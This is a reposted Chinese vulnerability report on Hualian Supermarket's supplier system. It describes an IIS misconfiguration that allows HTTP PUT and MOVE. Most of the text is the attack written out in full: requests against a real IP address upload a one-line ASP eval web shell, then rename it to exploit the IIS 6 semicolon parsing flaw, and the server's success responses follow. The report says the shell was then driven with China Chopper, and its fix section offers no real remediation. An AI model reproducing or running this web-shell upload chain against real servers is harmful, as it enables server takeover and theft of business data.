来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 华联超市股份有限公司是中国国内第一家上市的连锁超市公司,其前身为成立于1993年1月的上海华联超市公司。本漏洞出现在华联超市供应商系统中,导致供应商信息泄露。详细说明:由...
华联超市股份有限公司是中国国内第一家上市的连锁超市公司,其前身为成立于1993年1月的上海华联超市公司。
本漏洞出现在华联超市供应商系统中,导致供应商信息泄露。
详细说明:
由于IIS配置不当,开放put、move方法,导致文件上传,并且可move为jpg文件,利用IIS解析漏洞可执行上传文件。
在测试过程中出现了个小插曲,只能put txt文件,不能move为asp文件,后来发现可以move为jpg文件。
目标地址:218.204.14.84
请求:
PUT /te.txt HTTP/1.1
Host: 218.204.14.84
Content-Length: 30
<%eval request("testtest")%>
返回:
HTTP/1.1 201 Created
Date: Tue, 25 Jun 2013 14:01:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://218.204.14.84/te.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
请求:
MOVE /te.txt HTTP/1.1
Host: 218.204.14.84
Destination: http://218.204.14.84/sh.asp;.jpg
返回:
HTTP/1.1 201 Created
Date: Tue, 25 Jun 2013 13:59:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://218.204.14.84/sh.asp;.jpg
Content-Type: text/xml
Content-Length: 0
上传上去后直接上菜刀
修复方案:
好多漏洞,都不知道咋补
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com